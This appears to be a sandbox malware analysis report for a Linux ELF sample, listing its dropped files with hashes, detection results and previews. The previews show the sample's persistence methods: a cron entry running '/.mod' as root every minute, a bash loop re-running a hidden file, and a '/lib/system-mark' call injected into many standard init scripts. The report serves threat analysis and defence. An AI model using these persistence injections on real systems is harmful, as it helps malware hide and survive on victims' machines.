                                                                                                  • Filename: fL4E1jNVCt.elf, Detection: malicious, Browse
                                                                                                  • Filename: Xq5coKA8BI.elf, Detection: malicious, Browse
                                                                                                  • Filename: Ww0lpzmYHO.elf, Detection: malicious, Browse
                                                                                                  • Filename: c4RvDuLtq1.elf, Detection: malicious, Browse
                                                                                                  • Filename: linux_arm5.elf, Detection: malicious, Browse
                                                                                                  • Filename: linux_aarch64.elf, Detection: malicious, Browse
                                                                                                  • Filename: linux_amd64.elf, Detection: malicious, Browse
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:#!/bin/bash./usr/lib/libgdi.so.0.8.1
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):147
                                                                                                  Entropy (8bit):3.9137559459093465
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:3Rk4WtwyIRKsSEvq2TLQdHjhOdQBHXWcMhAB4WtwyIRKsSEvn:hRtAsfq2MdHjcy3WxWqtAsfn
                                                                                                  MD5:390F03CE121474845DBF223B02B3404C
                                                                                                  SHA1:4D838A9835C0449907C2BF5CB67D74AA6AAEEA45
                                                                                                  SHA-256:AD5B3599CBCE7EFA33A424EEA8624AB561E40E6C37C0D7E9C01DEF276C67B75E
                                                                                                  SHA-512:A0E2C39F3C93E825EE842ED4F5E36C49FEC28A022404418BAB73266C81DA99AFDEAEC3F4662CC37E5B35DD1009CC66CFA541CEC8F2A485FF7D0F2F8AA82EA3B8
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:e74ed74ec65f017ed1638a49c1350a23fc63f216de3c797a.e464ed5cf25f2831d065cf4dc1350d7ee85d8a5fc939277a.e74ed74ec65f017ed1638a49c1350a23fc63f216de3c797a.
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:Bourne-Again shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):63
                                                                                                  Entropy (8bit):4.619727741986734
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:TKH/zOsUF4K0WJTD0HXD:LsUF4kDYXD
                                                                                                  MD5:6CB66DDA6E7B14F42654921B3EC25226
                                                                                                  SHA1:B39354C512D130E1C52E9163DC12C4D5704A60A7
                                                                                                  SHA-256:45A2B263B893B33C703B7E5F64F04DE776D1DC9578BE65C5047195CD531FEF2A
                                                                                                  SHA-512:91A32A8C6B9490CB31CDB79C2E8697DAF1637C63136658B46037D60ED47D2B6D685F62D526E87960BAF93C6875295CF0C892EDAF65B34CBEB00D9961FEE7938B
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: linux_386.elf, Detection: malicious, Browse
                                                                                                  • Filename: linux_arm7.elf, Detection: malicious, Browse
                                                                                                  • Filename: utZX7JAuMU.elf, Detection: malicious, Browse
                                                                                                  • Filename: fL4E1jNVCt.elf, Detection: malicious, Browse
                                                                                                  • Filename: Xq5coKA8BI.elf, Detection: malicious, Browse
                                                                                                  • Filename: Ww0lpzmYHO.elf, Detection: malicious, Browse
                                                                                                  • Filename: c4RvDuLtq1.elf, Detection: malicious, Browse
                                                                                                  • Filename: linux_arm5.elf, Detection: malicious, Browse
                                                                                                  • Filename: linux_aarch64.elf, Detection: malicious, Browse
                                                                                                  • Filename: linux_amd64.elf, Detection: malicious, Browse
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:#!/bin/bash.while [ 1 ]; do.sleep 60./etc/opt.services.cfg.done
                                                                                                  Process:/bin/bash
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):24
                                                                                                  Entropy (8bit):3.000961982762677
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:HFdtKeIBFv:l6eIBV
                                                                                                  MD5:6B13F24B625DC5B832A4AE80CFAB7DDA
                                                                                                  SHA1:8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
                                                                                                  SHA-256:AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
                                                                                                  SHA-512:76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
                                                                                                  Malicious:true
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:*/1 * * * * root /.mod .
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2304
                                                                                                  Entropy (8bit):5.099881186780916
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:9tdVEA2+3MPMiOMdxA3Gbsbcq1himLHLHmvgjWL:9tdVEA2+3MPiI3Qbcq1Q4Hrmvt
                                                                                                  MD5:BD41974D1C7269BD429343943C8ED10A
                                                                                                  SHA1:D99E55E32229483A694B8B2EFEC8D15CF1C8FCCE
                                                                                                  SHA-256:56044D786BA8F4B11DDF9DBC88502ECE10246991CA383F913E9B86E57F19A28E
                                                                                                  SHA-512:A386FA323285EF24A9A442A5CEB8D9B2A36409B7BEC2D729031C7F83C6F3664EA1A745D35CA487A25FC953B6197F3A9FF1B35EEEFD2F90262BC2EEA7BB89D522
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] || exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] || return 0. if [ "$MODULES" = "all" ]; then./lib/system-mark. MODULES="$(sed -rn 's#^(/lib/mod
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5694
                                                                                                  Entropy (8bit):5.4204403708834565
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:iKtDd9/iwmDaLEuE9nwsmFRzF+rc17NyppyhHk5eEkv:iCdlW6EuUnZeRB+rc15yryZkq
                                                                                                  MD5:14EB05544D93BC0B09262334CCB79F2C
                                                                                                  SHA1:620AC9E2B5A23703A568800376CE590445FDFBD5
                                                                                                  SHA-256:C52ED6032904A94A0B83DCD1CDFA83D48DA29D049A5F29BB90265492120183E4
                                                                                                  SHA-512:83DCDC085FBFEEC1843D8C5E8978162AA34F9ECD0E7BF4E8BBF8D8D005837FF6A69F56BF7988400CB5AF07A5AF63D6471BD8BC2DAE223CDA3500F07B0EE9C36B
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] || exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2124
                                                                                                  Entropy (8bit):4.760217966755678
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:aiF8WzzU+LuN5K6YqfOv5i1CPeFecyZR11s+M8k93ILlfWW6910kF4T0Op:7RzgTNNOhi1eAryZR1vX5fTKX00+
                                                                                                  MD5:B8F9EF2F7B8875CFEE672094FF6B7829
                                                                                                  SHA1:901405E0A0F9AF0D39010FB609E06A34FA9918F5
                                                                                                  SHA-256:11696FDED80A45C7CD5351D01D0C4419E69A863C3774F7F37C3FD22F22F3EE16
                                                                                                  SHA-512:A90371D6664E9043A8FD43A8138B245C228AFF9E64AC6A41D73C849C0CF746ABFAEABB2C1D2BEEBBC05D7451A2B84DAE4E80A0BDF64864A390FE950437CB4745
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron || exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system-mark. exit 1. fi. log_daemon_msg "Starting
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3826
                                                                                                  Entropy (8bit):5.249219751257144
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:RFCjnn83hjz3n1zJNSNuDNBqNPoNpMbANEF7gG9M3zRVhszRVhxRl:Wjn4hj779Gjl
                                                                                                  MD5:DE4607EB984BD8C2751A19FED2566718
                                                                                                  SHA1:B605ED61D40829230C99D2C54B401CD2E154DE20
                                                                                                  SHA-256:F6BC11FE360F4DB66CB6B1C7763DC087E5D8F76A7D8145F08F617FD10C4FBFFD
                                                                                                  SHA-512:D932550ED8287788D8E14165CB47EB3A649D40B8AE6E8EEEC6ADCCC3563D8B376BBDE5C804205BD9B174CC3786154292C2D352307F41D9649312D9BF615DFD0C
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3050
                                                                                                  Entropy (8bit):5.216428196190724
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jV/OxxHuoBusZABLm/tiUmZmNndBuSZWg/e/fuppzDGdxboGxz5:jV/OxNDBusZABLm1BmOnbuSZWg2/anOT
                                                                                                  MD5:FB82D03D336FC2AC2901C9D28682B408
                                                                                                  SHA1:992649B4B941B5B5372A6215DA4A5231BFDCD0BF
                                                                                                  SHA-256:F9AFCA8A53AF95CC19F4D1D2495F80335924F5C65ABE9147C5D46AE29CBEC76C
                                                                                                  SHA-512:8EE7107F9FCB458989553B871B06823646B765980D7BBF84C7110C0FFEA116DE7D141D5FE21BA2CFDBCA9A423434AE276D3949AB6EF1EACED8DEF7DFE6D16C40
                                                                                                  Malicious:true
                                                                                                  Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] || exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME || true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] || mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] || [ -n "`ls /va
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2453
                                                                                                  Entropy (8bit):4.851897064111941
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:9s2V+ig+Ui83MZoJQukTS9VC2/ulMA0uv3uKv2ZsGyjyRft/zsDE7Ed:93oijU4ukTSZux0uv3uKvdJORlADHd
                                                                                                  MD5:84273238ABAA8A7DE2D516C95D92F171
                                                                                                  SHA1:875222E1EE9FE460931E5340C94F958D1DB14C9D
                                                                                                  SHA-256:2BDB658E48A470E440378BC4BC4CC48B9B228BC3DF759187787A7D9FD71EEC90
                                                                                                  SHA-512:C226B5813A17D0640FBC77D09889F19F638FF9701CCC2E933B3DC8749674BC1918FD22011096126FEBBBBF55F91BE1D78DF8CC176D4465BA4A2426414C2D1D88
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON || exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1193
                                                                                                  Entropy (8bit):5.0501124070839
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:ai3V6yXngSBVSBNyj6edNHcBcN6ekvx2w5mw+76opC:73ZngWVWNMNH0Y6bJ2w4wrJ
                                                                                                  MD5:A79B82CEAEE457E62E6EA7BAF7D1CAE5
                                                                                                  SHA1:B1EEBF3A9994B719F88E63BAC51A40EF3E3A4082
                                                                                                  SHA-256:76950791A135F0DFCCBE3A246A8085304345B40AC3DFE30BF1CA53C6BF81FD95
                                                                                                  SHA-512:4B6A9CEAEAC8952255DA0EAED35DAB689D80D3BD2B7D69CF3BF36D36271CCA309114D3E32C6C6797143C991DF1EAEB6491A7A36DE6AF9633F71AECB4B3D40C4E
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system-mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 || exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable || CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable || CODE=$?. log_end_msg $CODE. exi
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3071
                                                                                                  Entropy (8bit):5.403760092319036
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:71OoPrcMbC/BUUzGrm92+kbM935LmiVQoOZoKkkFjM+Zh9YDFjMrfOte:79TcWC/BUeem92R4V5LROt5r9CE2A
                                                                                                  MD5:E001FF7DBF2452314EEC95D08540D7AF
                                                                                                  SHA1:B2B63E00B1685EAA0DACC4D5F2C07C15F0D6AE55
                                                                                                  SHA-256:D6AA950CFA0BA62353E3734AB3E43F1B402C1B7F95CAC3C5D99D8453D299BDF3
                                                                                                  SHA-512:A9EA2F92C5A94330041228C7AECEB44718EBA47017ED7A41DEC87D6EAD6D7B34F968A79CFCFDDCC38561D964D354BFB63F3F52C2EFEE76C38C80DECCEC2FA944
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1301
                                                                                                  Entropy (8bit):4.3356283043101165
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:9lBiePItKzeBcx2o8/z3ejhTJckS5gzjdJwZWkZg7zcOqb6:93PyKzYcg/LshTJckS5gJw8kG7A9b6
                                                                                                  MD5:FE88F57D8990408CAAF7688C8EB6D734
                                                                                                  SHA1:7160510037CCA5505F40EFBE4CE8CCC777EAECE3
                                                                                                  SHA-256:C01D230B67C35FB75446E7A4599A09751E8859A4462CD5EB34DF9F186B28049F
                                                                                                  SHA-512:3DDA7EAF95F80FD3E35D8FDBF9AB77126E2CBF39CAA5C7A1275227D5267683F43504B191F0E08E901F93667AAFEE1F21F79BA3C8A27D5622C990DAA3AE39583D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop|status). # console-setup isn't a daemon. ;;. start|force-reload|restart|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system-mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3111
                                                                                                  Entropy (8bit):4.911661386459712
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:5PMic6MicW4dJIrcz8WD23fK2LAb38CE1ATGuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsZCTHMnidD/A3gU
                                                                                                  MD5:0E0A4A7372459B9C2D8F45BAA40A64B3
                                                                                                  SHA1:6DEAF952235F89CBDD83FBE48C89A4F048E52043
                                                                                                  SHA-256:2B88ED8EFDF3262040903719AA03156C8CD73B50CF2F2FCCACB33693FE4110D6
                                                                                                  SHA-512:4E11C50B5F5D95CAE5B374C4597DD83F79434876598BD9C5FC32D37B765885DC1FF920D96D6594E548F08DC9D367D8C74F704C9BA49056749E5A3B4CD6D13C50
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON || exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):955
                                                                                                  Entropy (8bit):5.160229628002615
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrPcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKZcr/ZkVyKDpjQ
                                                                                                  MD5:3B43339B088088E5B725575549A61F55
                                                                                                  SHA1:98AF37D27DC1A2EFE51AD74366137D375E631BB3
                                                                                                  SHA-256:BF85CED45A7B48892F49D608E189307CC08330A4F2834289B847B457DFD7D28A
                                                                                                  SHA-512:AF7347AEE4625DBD7C23A9A411362EC940B17DBBA794E9B89DC37D893EBCB445044BDB52D21197DBCEF73C75CF697E935D729110A2125D168E82D6B5E24938FC
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn]*)..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart|reload|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.*)..echo "Usage: cryptdisks {start|stop|restart|reload|force-reload|force-start}"..exit 1..;;.esac..
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):914
                                                                                                  Entropy (8bit):5.158660421998386
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrPcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CeKYZkVyKDvjQ
                                                                                                  MD5:905C0E1E5CC6FFC62CA21752E3F1753E
                                                                                                  SHA1:8810356FC23199F23631A7656815A431E34C4C1A
                                                                                                  SHA-256:6418AB31DBC9A1222A89C3D896C534373D9CB2D8D5D42FC75699889979E0AC34
                                                                                                  SHA-512:C7735CFB23C6CC924E7B55D825F352EBFB86CAEA48DF358499EF294EBE82F49F325F3C1098AA717BA622A8545E9A116C2648B44E2066597C5D4A37E71E6F77F8
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system-mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn]*)..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart|reload|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.*)..echo "Usage: cryptdisks-early {start|stop|restart|reload|force-reload|force-start}"..exit 1..;;.esac..
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2856
                                                                                                  Entropy (8bit):5.2245818519394565
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:76MLNMwmbAzAZVCoLqLVO1Z6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/F1RetsJ:7BWwmEMZVChFB7UoAaZUoGDvuG/UoGr/
                                                                                                  MD5:A13A7862BD0038FC523BFDFD69743E21
                                                                                                  SHA1:02BDC079157F4E2DF13C4CD4EF92BF477512348E
                                                                                                  SHA-256:0B82721F8B1FA32F5D25FE373FCD6DC540296675AFAD5C04A0EA18C4855DF29D
                                                                                                  SHA-512:4856AEFE6C5516CD19438DAD4689B3D656BA0ACFD0E498ABDA54628E1287B2C9C340040799C5B8AE68DA67970E19B41264E0F7C0416108E53D6477F5F18C7AC9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON || exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1979
                                                                                                  Entropy (8bit):5.144887658077899
                                                                                                  Encrypted:false
